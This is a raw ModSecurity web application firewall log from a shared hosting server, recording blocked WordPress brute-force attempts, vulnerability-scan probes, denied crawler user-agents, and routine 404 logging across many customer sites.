[Tue May 26 14:10:51.886963 2026] [security2:error] [pid 585807:tid 586017] [client 202.141.30.10:65492] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVck-Hp6I37JgAKrHUbswAAANQ"]
[Tue May 26 14:10:52.058348 2026] [security2:error] [pid 585807:tid 586049] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVck-Hp6I37JgAKrHUbrAAAAPM"]
[Tue May 26 14:10:52.328217 2026] [security2:error] [pid 585807:tid 585917] [remote 74.7.241.58:37058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVclOHp6I37JgAKrHUbxgAAw20"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 14:10:52.748300 2026] [security2:error] [pid 585807:tid 586029] [client 185.191.171.13:27638] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVclOHp6I37JgAKrHUb1QAAAOA"]
[Tue May 26 14:10:52.748440 2026] [security2:error] [pid 585807:tid 586029] [client 185.191.171.13:27638] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVclOHp6I37JgAKrHUb1QAAAOA"]
[Tue May 26 14:10:54.343689 2026] [security2:error] [pid 585807:tid 586016] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcleHp6I37JgAKrHUcBAAAANM"]
[Tue May 26 14:10:54.425775 2026] [security2:error] [pid 585807:tid 586017] [client 95.70.131.179:63855] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVcluHp6I37JgAKrHUcDAAAANQ"]
[Tue May 26 14:10:54.425916 2026] [security2:error] [pid 585807:tid 586017] [client 95.70.131.179:63855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVcluHp6I37JgAKrHUcDAAAANQ"]
[Tue May 26 14:10:56.617504 2026] [security2:error] [pid 585807:tid 585944] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcmOHp6I37JgAKrHUcTQAAAIw"]
[Tue May 26 14:10:56.927843 2026] [security2:error] [pid 585807:tid 585989] [client 181.16.234.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcmOHp6I37JgAKrHUcXQAAALg"]
[Tue May 26 14:10:59.348198 2026] [security2:error] [pid 585807:tid 586030] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcmuHp6I37JgAKrHUcpgAAAOE"]
[Tue May 26 14:10:59.435961 2026] [security2:error] [pid 585807:tid 586002] [client 114.119.128.56:64855] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/pricing-table/"] [unique_id "ahVcm-Hp6I37JgAKrHUctwAAAMU"], referer: http://glorodavionics.com/pricing-table/
[Tue May 26 14:11:01.390698 2026] [security2:error] [pid 585807:tid 586022] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcnOHp6I37JgAKrHUc5gAAANk"]
[Tue May 26 14:11:02.732777 2026] [security2:error] [pid 585807:tid 585981] [client 202.141.30.10:65396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcnuHp6I37JgAKrHUdJQAAALA"]
[Tue May 26 14:11:02.732875 2026] [security2:error] [pid 585807:tid 585981] [client 202.141.30.10:65396] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcnuHp6I37JgAKrHUdJQAAALA"]
[Tue May 26 14:11:03.099536 2026] [security2:error] [pid 585807:tid 586019] [client 74.7.175.160:33756] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "amdsi.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVcn-Hp6I37JgAKrHUdOgAA1jk"]
[Tue May 26 14:11:03.473209 2026] [security2:error] [pid 585807:tid 585939] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcn-Hp6I37JgAKrHUdNAAAAIc"]
[Tue May 26 14:11:04.249258 2026] [security2:error] [pid 585807:tid 586012] [client 69.58.72.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVcoOHp6I37JgAKrHUdYgAAAM8"], referer: https://anujtradingco.com
[Tue May 26 14:11:05.771753 2026] [security2:error] [pid 585807:tid 585946] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcoeHp6I37JgAKrHUdkQAAAI4"]
[Tue May 26 14:11:07.887237 2026] [security2:error] [pid 585807:tid 585947] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVco-Hp6I37JgAKrHUdzQAAAI8"]
[Tue May 26 14:11:09.742584 2026] [security2:error] [pid 585807:tid 586027] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcpeHp6I37JgAKrHUeAQAAAN4"]
[Tue May 26 14:11:10.494928 2026] [security2:error] [pid 585807:tid 586034] [client 120.240.178.217:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVcpOHp6I37JgAKrHUd8gAAAOU"]
[Tue May 26 14:11:11.546451 2026] [security2:error] [pid 585807:tid 585993] [client 95.70.131.179:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVcp-Hp6I37JgAKrHUePAAAALw"]
[Tue May 26 14:11:11.546581 2026] [security2:error] [pid 585807:tid 585993] [client 95.70.131.179:64016] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVcp-Hp6I37JgAKrHUePAAAALw"]
[Tue May 26 14:11:12.353646 2026] [security2:error] [pid 585807:tid 586004] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcp-Hp6I37JgAKrHUeTgAAAMc"]
[Tue May 26 14:11:13.681047 2026] [security2:error] [pid 585807:tid 585988] [client 202.141.30.10:35416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcqeHp6I37JgAKrHUebwAAALc"]
[Tue May 26 14:11:13.681175 2026] [security2:error] [pid 585807:tid 585988] [client 202.141.30.10:35416] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcqeHp6I37JgAKrHUebwAAALc"]
[Tue May 26 14:11:14.757930 2026] [security2:error] [pid 585807:tid 586004] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcquHp6I37JgAKrHUeiAAAAMc"]
[Tue May 26 14:11:14.868877 2026] [security2:error] [pid 585807:tid 585977] [client 47.128.121.6:49144] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.toronto121mortgage.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVcquHp6I37JgAKrHUelQAAAKw"]
[Tue May 26 14:11:16.977444 2026] [security2:error] [pid 585807:tid 586033] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcrOHp6I37JgAKrHUewwAAAOQ"]
[Tue May 26 14:11:19.274353 2026] [security2:error] [pid 585807:tid 585961] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcruHp6I37JgAKrHUe-gAAAJw"]
[Tue May 26 14:11:20.957304 2026] [security2:error] [pid 585807:tid 586053] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcsOHp6I37JgAKrHUfJgAAAPc"]
[Tue May 26 14:11:22.302446 2026] [security2:error] [pid 585807:tid 586001] [client 27.60.64.123:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcseHp6I37JgAKrHUfUAAAAMQ"]
[Tue May 26 14:11:23.795598 2026] [security2:error] [pid 585807:tid 585999] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcs-Hp6I37JgAKrHUfdwAAAMI"]
[Tue May 26 14:11:24.717718 2026] [security2:error] [pid 585807:tid 586035] [client 202.141.30.10:35464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVctOHp6I37JgAKrHUfjwAAAOY"]
[Tue May 26 14:11:24.717840 2026] [security2:error] [pid 585807:tid 586035] [client 202.141.30.10:35464] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVctOHp6I37JgAKrHUfjwAAAOY"]
[Tue May 26 14:11:25.362974 2026] [security2:error] [pid 585807:tid 585975] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVctOHp6I37JgAKrHUfoQAAAKo"]
[Tue May 26 14:11:27.689318 2026] [security2:error] [pid 585807:tid 585821] [remote 57.141.2.22:35521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVct-Hp6I37JgAKrHUf_QAAig0"]
[Tue May 26 14:11:27.716844 2026] [security2:error] [pid 585807:tid 585979] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVct-Hp6I37JgAKrHUf8wAAAK4"]
[Tue May 26 14:11:30.193784 2026] [security2:error] [pid 585807:tid 586049] [client 45.205.1.28:65520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahVcuuHp6I37JgAKrHUgQwAAAPM"]
[Tue May 26 14:11:30.551635 2026] [security2:error] [pid 585807:tid 586023] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcuuHp6I37JgAKrHUgRQAAANo"]
[Tue May 26 14:11:30.978093 2026] [security2:error] [pid 585807:tid 586034] [client 114.119.131.211:64205] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/wp-content/uploads/img_54786321.jpg"] [unique_id "ahVcuuHp6I37JgAKrHUgWAAAAOU"], referer: https://koneksi.com.co/wp-content/uploads/img_54786321.jpg
[Tue May 26 14:11:31.793799 2026] [security2:error] [pid 585807:tid 586032] [client 51.68.111.209:16027] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahVcu-Hp6I37JgAKrHUgawAAAOM"]
[Tue May 26 14:11:31.794043 2026] [security2:error] [pid 585807:tid 586032] [client 51.68.111.209:16027] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahVcu-Hp6I37JgAKrHUgawAAAOM"]
[Tue May 26 14:11:32.772112 2026] [security2:error] [pid 585807:tid 585976] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcvOHp6I37JgAKrHUggAAAAKs"]
[Tue May 26 14:11:32.834787 2026] [security2:error] [pid 585807:tid 585837] [remote 91.210.171.209:37202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVcvOHp6I37JgAKrHUghwAAmh0"]
[Tue May 26 14:11:34.449558 2026] [security2:error] [pid 585807:tid 585849] [remote 47.128.52.101:28252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/2022/09/23/the-two-pronged-power-of-visibility/"] [unique_id "ahVcvuHp6I37JgAKrHUgrgAAzSk"]
[Tue May 26 14:11:35.321459 2026] [security2:error] [pid 585807:tid 585951] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcvuHp6I37JgAKrHUgwQAAAJM"]
[Tue May 26 14:11:35.547552 2026] [security2:error] [pid 585807:tid 585938] [client 202.141.30.10:35533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcv-Hp6I37JgAKrHUg3QAAAIY"]
[Tue May 26 14:11:35.547682 2026] [security2:error] [pid 585807:tid 585938] [client 202.141.30.10:35533] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcv-Hp6I37JgAKrHUg3QAAAIY"]
[Tue May 26 14:11:37.306809 2026] [security2:error] [pid 585807:tid 586016] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcwOHp6I37JgAKrHUhBQAAANM"]
[Tue May 26 14:11:37.525748 2026] [security2:error] [pid 585807:tid 586014] [client 205.185.127.250:62343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.127.185.205.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVcweHp6I37JgAKrHUhEgAAANE"]
[Tue May 26 14:11:39.038939 2026] [security2:error] [pid 585807:tid 586037] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcwuHp6I37JgAKrHUhPQAAAOg"]
[Tue May 26 14:11:41.826810 2026] [security2:error] [pid 585807:tid 585997] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcxeHp6I37JgAKrHUhkAAAAMA"]
[Tue May 26 14:11:43.469608 2026] [security2:error] [pid 585807:tid 585966] [client 182.48.83.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcx-Hp6I37JgAKrHUhvQAAAKE"]
[Tue May 26 14:11:43.497165 2026] [security2:error] [pid 585807:tid 585981] [client 95.70.131.179:63376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVcx-Hp6I37JgAKrHUhwgAAALA"]
[Tue May 26 14:11:43.497335 2026] [security2:error] [pid 585807:tid 585981] [client 95.70.131.179:63376] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVcx-Hp6I37JgAKrHUhwgAAALA"]
[Tue May 26 14:11:43.876721 2026] [security2:error] [pid 585807:tid 585871] [remote 209.42.18.223:41804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVcx-Hp6I37JgAKrHUhzgAAnT8"]
[Tue May 26 14:11:44.135370 2026] [security2:error] [pid 585807:tid 586022] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcx-Hp6I37JgAKrHUh0wAAANk"]
[Tue May 26 14:11:46.470156 2026] [security2:error] [pid 585807:tid 585960] [client 202.141.30.10:35353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcyuHp6I37JgAKrHUiEgAAAJs"]
[Tue May 26 14:11:46.470288 2026] [security2:error] [pid 585807:tid 585960] [client 202.141.30.10:35353] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcyuHp6I37JgAKrHUiEgAAAJs"]
[Tue May 26 14:11:46.778993 2026] [security2:error] [pid 585807:tid 586022] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcyuHp6I37JgAKrHUiDQAAANk"]
[Tue May 26 14:11:48.629958 2026] [security2:error] [pid 585807:tid 586039] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVczOHp6I37JgAKrHUiXgAAAOk"]
[Tue May 26 14:11:50.122849 2026] [security2:error] [pid 585807:tid 585912] [remote 5.42.158.148:57510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVczeHp6I37JgAKrHUikAAA0Wg"]
